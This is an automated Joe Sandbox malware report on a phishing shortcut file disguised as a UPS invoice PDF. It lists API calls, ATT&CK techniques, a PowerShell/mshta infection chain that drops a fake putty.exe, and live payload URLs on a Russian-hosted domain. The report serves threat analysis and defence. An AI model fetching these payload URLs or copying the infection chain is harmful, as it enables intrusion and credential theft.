Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF67864A3E0 GetProcAddress,GetUserNameA,GetUserNameA,12_2_00007FF67864A3E0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6786B697C _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,12_2_00007FF6786B697C
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6786179B0 GetVersionExA,GetProcAddress,12_2_00007FF6786179B0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF67860FE90 socket,SetHandleInformation,setsockopt,getaddrinfo,htons,inet_addr,htonl,htonl,htons,bind,listen,closesocket,WSAGetLastError,closesocket,closesocket,WSAGetLastError,12_2_00007FF67860FE90
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF67860F930 closesocket,socket,SetHandleInformation,setsockopt,setsockopt,setsockopt,htonl,htons,bind,WSAGetLastError,WSAGetLastError,htons,htonl,htons,connect,WSAGetLastError,12_2_00007FF67860F930
MITRE ATT&CK Matrix (listed by tactic column; a leading number is the report's signature-count badge for that technique):
Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies, Network Topology
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless, Malvertising
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application
Execution: 1 Native API, 112 Command and Scripting Interpreter, 2 PowerShell, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job, Command and Scripting Interpreter
Persistence: 1 DLL Side-Loading, Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At
Privilege Escalation: 1 DLL Side-Loading, 12 Process Injection, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At
Defense Evasion: 1 Deobfuscate/Decode Files or Information, 12 Obfuscated Files or Information, 1 DLL Side-Loading, 121 Masquerading, 31 Virtualization/Sandbox Evasion, 12 Process Injection, Compile After Delivery, Indicator Removal from Tools, HTML Smuggling
Credential Access: 11 Input Capture, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow
Discovery: 2 System Time Discovery, 1 Account Discovery, 2 File and Directory Discovery, 34 System Information Discovery, 21 Security Software Discovery, 11 Process Discovery, 31 Virtualization/Sandbox Evasion, 11 Application Window Discovery, 1 System Owner/User Discovery
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services, Direct Cloud VM Connections
Collection: 1 Archive Collected Data, 1 Email Collection, 11 Input Capture, 3 Clipboard Data, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged
Command and Control: 2 Ingress Tool Transfer, 11 Encrypted Channel, 2 Non-Application Layer Protocol, 13 Application Layer Protocol, Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement, Internal Defacement
Behavior Graph ID: 1466029 | Sample: Invoice-UPS-218931.pdf.lnk.... | Startdate: 02/07/2024 | Architecture: WINDOWS | Score: 100
Behavior graph nodes (flattened from the rendered graph; node numbers are the graph's own):
Sample (node 2): DNS nebulaquestcorporation.cc; signatures: Malicious sample detected (through community Yara rule), Antivirus detection for URL or domain, Windows shortcut file (LNK) starts blacklisted processes, 6 other signatures; started forfiles.exe (12) and svchost.exe (15)
forfiles.exe (12): signature: Windows shortcut file (LNK) starts blacklisted processes; started powershell.exe (18) and conhost.exe (21)
svchost.exe (15): 127.0.0.1 unknown unknown
powershell.exe (18): signatures: Windows shortcut file (LNK) starts blacklisted processes, Powershell drops PE file; started mshta.exe (23)
mshta.exe (23): nebulaquestcorporation.cc 5.188.88.146, 443, 49705, 49708 PINDC-ASRU Russian Federation; dropped C:\Users\user\AppData\...\invoiceupsstage[1], PE32; signatures: Windows shortcut file (LNK) starts blacklisted processes, Suspicious powershell command line found, Very long command line found; started powershell.exe (28)
powershell.exe (28): dropped C:\Users\user\AppData\Roaming\putty.exe, PE32+; started Acrobat.exe (31), putty.exe (33) and conhost.exe (35)
Acrobat.exe (31): started AcroCEF.exe (37)
AcroCEF.exe (37): started AcroCEF.exe (39)
AcroCEF.exe (39): 104.77.220.172, 443, 49723 AKAMAI-ASUS United States

Source | Detection | Scanner | Label
Invoice-UPS-218931.pdf.lnk.mal.lnk | 21% | ReversingLabs | Shortcut.Trojan.Pantera
Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\putty.exe | 0% | ReversingLabs
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
https://sectigo.com/CPS0 | 0% | URL Reputation | safe
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | 0% | URL Reputation | safe
http://ocsp.sectigo.com0 | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | 0% | URL Reputation | safe
https://www.chiark.greenend.org.uk/~sgtatham/putty/0 | 0% | URL Reputation | safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | 0% | URL Reputation | safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://aka.ms/pscore68 | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://nebulaquestcorporation.cc/cdnusa/putty.exe | 0% | Avira URL Cloud | safe
https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage...8 | 0% | Avira URL Cloud | safe
https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage...w | 0% | Avira URL Cloud | safe
https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage6 | 0% | Avira URL Cloud | safe
https://nebulaquestcorporation.cc/cdnusa/putty.exep | 0% | Avira URL Cloud | safe
https://nebulaquestcorporation.cc/cdnusa/invoiceupsstagegs | 0% | Avira URL Cloud | safe
https://nebulaquestcorporation.cc/cdnusa/upsinvoice.pdf | 0% | Avira URL Cloud | safe
https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage | 100% | Avira URL Cloud | malware
http://crl.ver) | 0% | Avira URL Cloud | safe
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0# | 0% | Virustotal
https://nebulaquestcorporation.cc/cdnusa/invoiceupsstageC: | 0% | Avira URL Cloud | safe
https://g.live.com/odclientsettings/ProdV2/C: | 0% | Avira URL Cloud | safe
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0# | 0% | Avira URL Cloud | safe
https://nebulaquestcorporation.cc/cdnusa/invoiceupsstageH | 0% | Avira URL Cloud | safe
https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe
https://nebulaquestcorporation.cc/ | 0% | Avira URL Cloud | safe
https://nebulaquestcorporation.cc/cdnusa/invoiceupsstagehttps://nebulaquestcorporation.cc/cdnusa/inv | 0% | Avira URL Cloud | safe
https://nebulaquestcorporation.cc/cdnusa/invoiceupsstageMI | 0% | Avira URL Cloud | safe
https://g.live.com/odclientsettings/ProdV2/C: | 0% | Virustotal
https://github.com/Pester/Pester | 1% | Virustotal
https://g.live.com/odclientsettings/Prod/C: | 0% | Avira URL Cloud | safe
https://nebulaquestcorporation.cc/cdnusa/upsinvoice.pdf0 | 0% | Avira URL Cloud | safe
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y | 0% | Avira URL Cloud | safe
https://www.chiark.greenend.org.uk/~sgtatham/putty/ | 0% | Avira URL Cloud | safe
https://nebulaquestcorporation.cc/cdnusa/invoiceupsstageLE_STRINGj | 0% | Avira URL Cloud | safe
https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage... | 100% | Avira URL Cloud | malware
https://nebulaquestcorporation.cc | 0% | Avira URL Cloud | safe
https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage$global:? | 0% | Avira URL Cloud | safe
https://nebulaquestcorporation.cc/cdnusa/invoiceupsstageYYC: | 0% | Avira URL Cloud | safe
https://www.chiark.greenend.org.uk/~sgtatham/putty/ | 0% | Virustotal
https://g.live.com/odclientsettings/Prod/C: | 0% | Virustotal
https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage. | 100% | Avira URL Cloud | malware
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y | 0% | Virustotal
https://nebulaquestcorporation.cc/cdnusa/invoiceupsstagero | 0% | Avira URL Cloud | safe
https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage/I | 100% | Avira URL Cloud | malware
https://nebulaquestcorporation.cc/cdnusa/invoiceupsstagees#M | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
nebulaquestcorporation.cc | 5.188.88.146 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://nebulaquestcorporation.cc/cdnusa/putty.exe | false | Avira URL Cloud: safe | unknown
https://nebulaquestcorporation.cc/cdnusa/upsinvoice.pdf | false | Avira URL Cloud: safe | unknown
https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000007.00000002.1725282576.000001FB10073000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://sectigo.com/CPS0 | powershell.exe, 00000007.00000002.1668722382.000001FB004B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1668722382.000001FB004B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB102FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB10DFC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.7.dr | false | URL Reputation: safe | unknown
https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage...8 | mshta.exe, 00000004.00000003.1790203146.0000023797681000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1792575197.0000023797681000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1782232696.0000023797681000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | powershell.exe, 00000007.00000002.1725282576.000001FB102FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB10DFC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.7.dr | false | URL Reputation: safe | unknown
http://ocsp.sectigo.com0 | powershell.exe, 00000007.00000002.1668722382.000001FB004B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1668722382.000001FB004B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB102FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB10DFC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.7.dr | false | URL Reputation: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000007.00000002.1668722382.000001FB0022B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage...w | mshta.exe, 00000004.00000003.1787060368.0000023F9A19E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1793563743.0000023F9A1A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1788076442.0000023F9A1A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1780951650.0000023F9A19E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1790777524.0000023F9A1A3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000007.00000002.1668722382.000001FB0022B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage6 | mshta.exe, 00000004.00000003.1782232696.00000237975FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1792460496.00000237975FE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://nebulaquestcorporation.cc/cdnusa/putty.exep | powershell.exe, 00000007.00000002.1668722382.000001FB004B8000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/License | powershell.exe, 00000007.00000002.1725282576.000001FB10073000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000007.00000002.1725282576.000001FB10073000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nebulaquestcorporation.cc/cdnusa/invoiceupsstagegs | mshta.exe, 00000004.00000003.1782232696.00000237975FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1792460496.00000237975FE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0# | powershell.exe, 00000007.00000002.1725282576.000001FB102FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB10DFC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.7.dr | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
http://crl.ver) | svchost.exe, 00000006.00000002.2769097256.00000253D7800000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://nebulaquestcorporation.cc/cdnusa/invoiceupsstageC: | mshta.exe, 00000004.00000002.1792396309.00000237975C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1792606600.00000237976B0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1787859516.00000237976AF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1781945206.00000237976AE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://g.live.com/odclientsettings/ProdV2/C: | svchost.exe, 00000006.00000003.1556558495.00000253D7630000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.dr | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://nebulaquestcorporation.cc/cdnusa/invoiceupsstageH | mshta.exe, 00000004.00000002.1792236967.0000023797580000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | powershell.exe, 00000007.00000002.1725282576.000001FB102FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB10DFC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.7.dr | false | URL Reputation: safe | unknown
https://www.chiark.greenend.org.uk/~sgtatham/putty/0 | powershell.exe, 00000007.00000002.1668722382.000001FB004B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1668722382.000001FB004B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB102FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB10DFC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.7.dr | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000007.00000002.1668722382.000001FB0022B000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal; Avira URL Cloud: safe | unknown
https://nebulaquestcorporation.cc/ | mshta.exe, 00000004.00000003.1782232696.000002379763A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1792460496.000002379763A000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://nebulaquestcorporation.cc/cdnusa/invoiceupsstagehttps://nebulaquestcorporation.cc/cdnusa/inv | mshta.exe, 00000004.00000003.1789392993.0000023F9FAA3000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://nebulaquestcorporation.cc/cdnusa/invoiceupsstageMI | mshta.exe, 00000004.00000002.1792396309.00000237975C0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | powershell.exe, 00000007.00000002.1668722382.000001FB004B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1668722382.000001FB004B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB102FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB10DFC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.7.dr | false | URL Reputation: safe | unknown
https://g.live.com/odclientsettings/Prod/C: | edb.log.6.dr | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://nebulaquestcorporation.cc/cdnusa/upsinvoice.pdf0 | powershell.exe, 00000007.00000002.1668722382.000001FB0022B000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y | powershell.exe, 00000007.00000002.1725282576.000001FB102FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB10DFC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.7.dr | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://www.chiark.greenend.org.uk/~sgtatham/putty/ | powershell.exe, 00000007.00000002.1725282576.000001FB102FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB10DFC000.00000004.00000800.00020000.00000000.sdmp, putty.exe, putty.exe, 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp, putty.exe, 0000000C.00000000.1637581496.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp, putty.exe.7.dr | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage... | mshta.exe, 00000004.00000003.1782232696.000002379763A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1792460496.000002379763A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://nebulaquestcorporation.cc/cdnusa/invoiceupsstageLE_STRINGj | mshta.exe, 00000004.00000002.1792262251.0000023797590000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | powershell.exe, 00000007.00000002.1668722382.000001FB004B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1668722382.000001FB004B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB102FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB10DFC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.7.dr | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 00000007.00000002.1725282576.000001FB10073000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000007.00000002.1725282576.000001FB10073000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nebulaquestcorporation.cc | powershell.exe, 00000007.00000002.1668722382.000001FB0022B000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage$global:? | powershell.exe | false | Avira URL Cloud: safe | unknown
https://nebulaquestcorporation.cc/cdnusa/invoiceupsstageYYC: | mshta.exe, 00000004.00000003.1780875436.0000023F9E0BE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage. | mshta.exe, 00000004.00000003.1782232696.00000237975FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1792460496.00000237975FE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://aka.ms/pscore68 | powershell.exe, 00000007.00000002.1668722382.000001FB00001000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nebulaquestcorporation.cc/cdnusa/invoiceupsstagero | forfiles.exe, 00000001.00000002.1527302987.00000229F2D10000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000007.00000002.1668722382.000001FB00001000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage/I | mshta.exe, 00000004.00000003.1782232696.00000237975FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1792460496.00000237975FE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://nebulaquestcorporation.cc/cdnusa/invoiceupsstagees#M | mshta.exe, 00000004.00000002.1792396309.00000237975E6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
5.188.88.146 | nebulaquestcorporation.cc | Russian Federation | 34665 | PINDC-ASRU | true
104.77.220.172 | unknown | United States | 16625 | AKAMAI-ASUS | false
IP
127.0.0.1
    Joe Sandbox version:40.0.0 Tourmaline
    Analysis ID:1466029
    Start date and time:2024-07-02 12:46:12 +02:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 7m 10s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of analysed new started processes analysed:21
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:Invoice-UPS-218931.pdf.lnk.mal.lnk
    Detection:MAL
    Classification:mal100.evad.winLNK@27/54@1/3
    EGA Information:
    • Successful, ratio: 33.3%
    HCA Information:
    • Successful, ratio: 90%
    • Number of executed functions: 46
    • Number of non-executed functions: 163
    Cookbook Comments:
    • Found application associated with file extension: .lnk
    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
    • Excluded IPs from analysis (whitelisted): 184.28.90.27, 184.28.88.176, 18.207.85.246, 107.22.247.231, 54.144.73.197, 34.193.227.236, 162.159.61.3, 172.64.41.3, 95.101.54.195, 2.16.202.123, 2.19.126.149, 2.19.126.143, 2.22.242.11, 2.22.242.123
    • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, identrust.edgesuite.net, slscr.update.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, a1952.dscq.akamai.net, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, prod.fs.microsoft.com.akadns.net, geo2.adobe.com, apps.identrust.com
    • Execution Graph export aborted for target mshta.exe, PID 4996 because there are no executed functions
    • Execution Graph export aborted for target powershell.exe, PID 4620 because it is empty
    • Not all processes were analyzed, report is missing behavior information
    • Report size exceeded maximum capacity and may have missing behavior information.
    • Report size exceeded maximum capacity and may have missing disassembly code.
    • Report size getting too big, too many NtEnumerateKey calls found.
    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtProtectVirtualMemory calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.
    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
    Time     | Type            | Description
    06:47:21 | API Interceptor | 2x Sleep call for process: svchost.exe modified
    06:47:22 | API Interceptor | 1x Sleep call for process: mshta.exe modified
    06:47:22 | API Interceptor | 37x Sleep call for process: powershell.exe modified
    06:47:39 | API Interceptor | 1x Sleep call for process: AcroCEF.exe modified
    Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
    5.188.88.146 | MOD_200.pdf.lnk | Get hash | malicious | Arc Stealer | Browse |
    104.77.220.172 | phish_alert_sp2_2.0.0.0.eml | Get hash | malicious | Unknown | Browse |
     | https://www.grosfichiers.com/qfurMCm3fdd | Get hash | malicious | Unknown | Browse |
     | #U75c5#U6bd2#U67e5#U6740#U5de5#U5177.exe | Get hash | malicious | Unknown | Browse |
     | Document PPS 430092.docx | Get hash | malicious | Unknown | Browse |
     | Comprobante.xla | Get hash | malicious | Unknown | Browse |
     | DHLR000698175.docx | Get hash | malicious | Unknown | Browse |
     | Payment advice.xls | Get hash | malicious | Unknown | Browse |
                    No context
    Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
    PINDC-ASRU | MOD_200.pdf.lnk | Get hash | malicious | Arc Stealer | Browse | 5.188.88.146
     | http://www.thisisatest29475728.com/reply283/secure/start.php | Get hash | malicious | Unknown | Browse | 91.215.85.79
     | SecuriteInfo.com.Win64.RansomX-gen.22171.1307.exe | Get hash | malicious | Conti, PureLog Stealer, Targeted Ransomware | Browse | 91.215.85.135
     | http://tinyurI.com/bn229tan | Get hash | malicious | Unknown | Browse | 5.188.88.20
     | http://raablogistics.com | Get hash | malicious | Unknown | Browse | 5.188.88.20
     | https://apidevst.com/ | Get hash | malicious | Unknown | Browse | 5.188.88.20
     | Ransom.exe | Get hash | malicious | Targeted Ransomware, TrojanRansom | Browse | 91.215.85.135
     | skid.mips.elf | Get hash | malicious | Gafgyt, Mirai | Browse | 80.87.206.123
     | skid.x86.elf | Get hash | malicious | Mirai, Gafgyt | Browse | 80.87.206.123
     | skid.mpsl.elf | Get hash | malicious | Gafgyt, Mirai | Browse | 80.87.206.123
    AKAMAI-AS | USPG96120000311.pdf.lnk.mal.lnk | Get hash | malicious | Unknown | Browse | 23.47.168.24
     | https://us02web.zoom.us/webinar/register/6317193087387/WN_wbycs5lISL2eo8rEP6qUDg#/registration | Get hash | malicious | Unknown | Browse | 23.50.131.159
     | Absa.pdf | Get hash | malicious | HTMLPhisher | Browse | 23.47.168.24
     | PUGPDU-64096.docx | Get hash | malicious | HTMLPhisher | Browse | 184.28.90.27
     | Absa.pdf | Get hash | malicious | Unknown | Browse | 23.47.168.24
     | Roblox Account Manager.exe | Get hash | malicious | Unknown | Browse | 92.122.18.57
     | Roblox Account Manager.exe | Get hash | malicious | Unknown | Browse | 92.122.18.57
     | https://app.smartsheet.com/b/download/att/1/4551989320961924/a9qsrcukwyvga6dsz82rixnmpg | Get hash | malicious | HTMLPhisher | Browse | 23.56.162.185
     | https://worker-aliggggg.farnazmonsef1.workers.dev/ | Get hash | malicious | Unknown | Browse | 2.19.244.157
     | https://cloudflare-workers-pages-vless-2gi.pages.dev/ | Get hash | malicious | Unknown | Browse | 2.19.104.10
    Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
    3b5074b1b5d032e5620f69f9f700ff0e | IF10339.pdf.lnk.mal.lnk | Get hash | malicious | Unknown | Browse | 5.188.88.146
     | https://ddec1-0-en-ctp.trendmicro.com:443/wis/clicktime/v1/query?url=https%3a%2f%2faagt%2damx%2dmoodle%2dmex.com%2freport%2finsights%2faction.php%3faction%3duseful%26forwardurl%3dhttps%253A%252F%252Faagt%2damx%2dmoodle%2dmex.com%252Freport%252Finsights%252Fdone.php%253Factionvisiblename%253D%2525C3%25259Atil%2526target%253D%5fblank%26predictionid%3d1580&umid=dfe32622-5afa-43d1-bc88-1d0d19378d86&auth=b37f34d438b54d6822929a8430f2a42f374caac4-c52e46d07bf23779234fc7b6680559fd6de91ad8 | Get hash | malicious | Unknown | Browse | 5.188.88.146
     | http://wiki.hoeron.com/doku.php?id=hoeron:kb:hardware:fortinet:2023-11-29-1701246124 | Get hash | malicious | Unknown | Browse | 5.188.88.146
     | purchase order - PO-011024-201.exe | Get hash | malicious | AgentTesla | Browse | 5.188.88.146
